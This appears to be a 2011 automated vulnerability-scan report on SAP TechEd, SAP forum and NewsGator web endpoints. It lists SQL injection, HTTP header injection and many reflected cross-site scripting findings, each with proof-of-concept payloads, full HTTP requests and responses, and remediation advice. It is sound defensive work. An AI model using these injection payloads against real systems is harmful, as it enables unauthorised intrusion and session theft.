SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The error parameter appears to be vulnerable to SQL injection attacks. The payloads 15267202%20or%201%3d1--%20 and 15267202%20or%201%3d2--%20 were each submitted in the error parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
<img src="pics/Error.gif" border="0" align="absmiddle"> Your form is incomplete. Please enter or correct the information in the fields below. <br /><br /> No e-mail address was supplied.No @ sign detected. An @ sign is part of every e-mail address.An @ sign cannot be the last character of the e-mail address.An @ sign cannot be the first character of the e-mail address.A valid e-mail address contains only one @ sign.No period detected. An e-mail address contains at least one period.The last character of the e-mail address cannot be a period.The first character of the e-mail address cannot be a period.A valid e-mail address cannot contain a comma. If you have a Compuserve account, substitute a period for the comma in your Compuserve ID, like so: <B>12345.6789@compuserve.com</B>.You cannot have a space as part of a single e-mail address.You cannot have an asterisk in an e-mail address.You cannot have a close parenthesis sign in an e-mail address.You cannot have an open parenthesis sign in an e-mail address.You cannot have a greater than sign in an e-mail address.You cannot have a less than sign in an e-mail address.You cannot have a colon in an e-mail address.You cannot have a semicolon in an e-mail address.You cannot have a double quote in an e-mail address.The person you are trying to invite is already in the Registration System.You must provide a last name.Please look for the checks below.We could not find a registration record with the confirmation number you entered.An e-mail to reset your password has been sent!You do not have access to this record!The record you are trying to access is still incomplete, please click on the Registration link and login to access your recor ...[SNIP]...
<td colspan="4" class="field-label" align="Left" valign="Top" width="700" style="padding-top:3px;padding-bottom:3px;"> <script type="text/javascript"> function displayQuestion(id1) { var browserName=navigator.appName; if (browserName=="Netscape") { document.getElementById(id1).style.display = 'table-row-group'; } else { document.getElementById(id1).style.display = 'inline'; } } function hideQuestion(id1) { document.getElementById(id1).style.display = 'none'; }
function displayHide(id1,id2) { if (document.RegForm.sTandC.checked) displayQuestion(id1) else hideQuestion(id1) } </script>
<p><strong>SAP TechEd Registrant Terms and Conditions</strong></p><p>This registration and your attendance at SAP TechEd is subject to the "<a href="javascript:newwindow('index.cfm?fuseaction=reg.TermsAndConditions&bHeader ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 16635132'%20or%201%3d1--%20 and 16635132'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
<script type="text/javascript" language="javascript"> try { // Match http or https var pattern = /^https?:\/\/(www(\d{3})?|wwwn|admin|webservice)\.sdn\.sap\.com/;
if (!pattern.test(parent.location.href)) { // preserve current protocol, whether http or https
parent.location.replace(document.location.protocol+'//www.sdn.sap.com/irj/scn/weblogs?blog=' + escape(document.location.pathname) + escape(document.location.search)); } } catch (e) { } </script> <noscript><!-- script for frames and spidering --></noscript>
The value of the d request parameter is copied into the Location response header. The payload 57e50%0d%0a7cb60e2cdc6 was submitted in the d parameter. This caused a response containing an injected HTTP header.
Issue background
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://reservoir.marketstudio.net/57e50 7cb60e ...[SNIP]...
3. Cross-site scripting (reflected)previousnext There are 139 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6a68f<script>alert(1)</script>2f938d81d11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f743b<script>alert(1)</script>1d42a6eebdc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d7944<script>alert(1)</script>23ec30e32fa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a2415<script>alert(1)</script>4d9ac83b755 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 117e1<script>alert(1)</script>973b6f008cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7c1bb<script>alert(1)</script>a2aabb6bf4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 60bc8<script>alert(1)</script>bf2497c4639 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8ebf5<script>alert(1)</script>6d25fbe996 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 142c9<script>alert(1)</script>9524fe82742 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c97fa<script>alert(1)</script>efe729d14 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4d7ad<script>alert(1)</script>af916879b70 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a5f4a<script>alert(1)</script>145318725a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 95f6f<script>alert(1)</script>da42c3dd6dc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 664f2<script>alert(1)</script>a81d0f7539a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f16e8<script>alert(1)</script>8de76daedec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 78724<script>alert(1)</script>6627191e19f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9726b<script>alert(1)</script>f1d958d7d40 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c11ea<script>alert(1)</script>3d8d2c650a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d00b2<script>alert(1)</script>2a60a99c87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 813b4<script>alert(1)</script>b80a639f654 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 13b92<script>alert(1)</script>2192398d55f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a1b69(a)5c9dcb45dbc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 97de3(a)c7cf365f0d3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3df4c<script>alert(1)</script>54d7771a769 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 39fa5<script>alert(1)</script>b22cba590c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the forumID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fdeb</script><a>7cc8d3868a3 was submitted in the forumID parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0OTYtMTMzMDdGOEUwRjEtRjQxNjEwNzEyOTNDN0QyNw== Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 9049 Vary: Accept-Encoding Date: Sat, 15 Oct 2011 14:25:11 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head> <!-- SDN Forums generated page --> <title>SAP Community Network Forums: Not Fou ...[SNIP]... "..." s.prop5="glo" s.prop6="visitor" s.prop9="logN" if(typeof pnf != "undefined") { s.pageType=pnf; s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/forum.jspa?forumID=2099fdeb</script><a>7cc8d3868a3&start=0"; } /* END CUSTOM CODING */ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t() if(s_code)document.write(s_code) } catch (e) {} //--> ...[SNIP]...
3.27. http://forums.sdn.sap.com/forum.jspa [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://forums.sdn.sap.com
Path:
/forum.jspa
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72910"><a>80712adb491 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0OTYtMTMzMDdGOTExOEUtODNFQTcyRDhDMjRBMjYzNg== Content-Type: text/html; charset=UTF-8 Content-Language: en-US SDN_FORUM: 209 SDN_CATEGORY: 6 Content-Length: 45770 Vary: Accept-Encoding Date: Sat, 15 Oct 2011 14:25:23 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head> <!-- SDN Forums generated page --> <title>SAP Community Network Forums: SAP Tec ...[SNIP]... <link rel="stylesheet" type="text/css" href="/style/style.jsp?72910"><a>80712adb491=1&forumID=209&start=0" /> ...[SNIP]...
3.28. http://forums.sdn.sap.com/forum.jspa [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://forums.sdn.sap.com
Path:
/forum.jspa
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e249</script><a>03d13503ced was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the start request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da61d</script><a>3343eb56bb4 was submitted in the start parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0OTYtMTMzMDdGOEYwNjctMUI4NjBFNTdCRjdFMjFB Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 9036 Vary: Accept-Encoding Date: Sat, 15 Oct 2011 14:25:14 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head> <!-- SDN Forums generated page --> <title>SAP Community Network Forums: </title ...[SNIP]... s.prop5="glo" s.prop6="visitor" s.prop9="logN" if(typeof pnf != "undefined") { s.pageType=pnf; s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/forum.jspa?forumID=209&start=0da61d</script><a>3343eb56bb4"; } /* END CUSTOM CODING */ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t() if(s_code)document.write(s_code) } catch (e) {} //--> ...[SNIP]...
3.30. http://forums.sdn.sap.com/thread.jspa [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://forums.sdn.sap.com
Path:
/thread.jspa
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf476</script><a>2f82619d2da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0OTYtMTMzMDdGOUU2RkMtNjhDNzA2NDFGQTJFMDE3NQ== Content-Type: text/html; charset=UTF-8 Content-Language: en-US SDN_FORUM: 209 SDN_CATEGORY: 6 SDN_THREAD: 2059162 SDN_MESSAGE: 10731664 Content-Length: 22343 Vary: Accept-Encoding Date: Sat, 15 Oct 2011 14:26:18 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head> <!-- SDN Forums generated page --> <title>SAP Community Network Forums: SAP SEC ...[SNIP]... "glo" s.prop6="visitor" s.prop9="logN" if(typeof pnf != "undefined") { s.pageType=pnf; s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/thread.jspa?threadID=2059162&tstart=0&bf476</script><a>2f82619d2da=1"; } /* END CUSTOM CODING */ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t() if(s_code)document.write(s_code) } catch (e) {} //--> ...[SNIP]...
3.31. http://forums.sdn.sap.com/thread.jspa [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://forums.sdn.sap.com
Path:
/thread.jspa
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4ddf"><a>ec5e2e237d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the threadID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6703c</script><a>08b4367be6b was submitted in the threadID parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the tstart request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b4c8</script><a>b798772e4f3 was submitted in the tstart parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the _dsrId request parameter is copied into the HTML document as plain text between tags. The payload 3aa10<script>alert(1)</script>92b285fbac7 was submitted in the _dsrId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /NGBuzz/buzz.ashx?load=data&apiToken=8A9F478544194B85AC55E891BBE40862&buzzId=215423&_dsrId=ngbuzz_215423_data3aa10<script>alert(1)</script>92b285fbac7 HTTP/1.1 Host: nmp.newsgator.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: */* Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/javascript; charset=utf-8 Last-Modified: Sat, 15 Oct 2011 13:56:52 GMT ETag: 634542838121454462 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Content-Length: 3034 Cache-Control: public, max-age=300 Date: Sat, 15 Oct 2011 14:24:41 GMT Connection: close
window.ng_scriptload({id:'ngbuzz_215423_data3aa10<script>alert(1)</script>92b285fbac7',status:200,statusText:'200 OK',response:{Data:[{PostId:21062774210,PubDate:new Date(1318646580000),FeedName:'SAP Developer Network SAP Weblogs: SAP TechEd',Title:'Tune in to SAP TechEd Live!',HtmlUrl ...[SNIP]...
The value of the buzzId request parameter is copied into the HTML document as plain text between tags. The payload c4314<script>alert(1)</script>7157f909e78 was submitted in the buzzId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /NGBuzz/buzz.ashx?buzzId=215423c4314<script>alert(1)</script>7157f909e78&apiToken=8A9F478544194B85AC55E891BBE40862 HTTP/1.1 Host: nmp.newsgator.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: */* Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/javascript; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Content-Length: 102 Cache-Control: private, max-age=600 Date: Sat, 15 Oct 2011 14:24:29 GMT Connection: close X-N: S
//An error occurred: Could not find Buzz item with id: 215423c4314<script>alert(1)</script>7157f909e78
3.36. http://nmp.newsgator.com/NGBuzz/buzz.ashx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://nmp.newsgator.com
Path:
/NGBuzz/buzz.ashx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 64204%3balert(1)//95fd43ea14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 64204;alert(1)//95fd43ea14 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NGBuzz/buzz.ashx?buzzId=215423&apiToken=8A9F478544194B85AC55E891BBE40862&64204%3balert(1)//95fd43ea14=1 HTTP/1.1 Host: nmp.newsgator.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: */* Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/javascript; charset=utf-8 Last-Modified: Fri, 07 Oct 2011 20:13:12 GMT ETag: 634536151927656250 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Content-Length: 3794 Cache-Control: public, max-age=600 Date: Sat, 15 Oct 2011 14:24:30 GMT Connection: close
try{var buzzTemplate_215423="\t{stringify CustomFooter}\n\t\t<div class=\"footerClass\">\n\t\t\t<!--- Style up your footer --->\n\t\t\t<a style=\"cursor: pointer;\" href=\"javascript:void(0)\" onclick ...[SNIP]...
var s = function(){ try{ if(typeof ng != "undefined" && typeof ng.buzz != "undefined" && ng.buzz.Buzzlet){ var b = new ng.buzz.Buzzlet({apiToken:'8A9F478544194B85AC55E891BBE40862',extraArgs:{64204;alert(1)//95fd43ea14:'1'},templateId:'buzzTemplate_215423',name:'_Events - SAP TechEd V2',buzzId:215423,targetId:null,orgCode:'6679',buzzTracking:{parentTrackingId:null,myTrackingId:null},scriptCtx:'window',analytics:{ngA ...[SNIP]...
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 4ee84<script>alert(1)</script>910c67c89ad was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
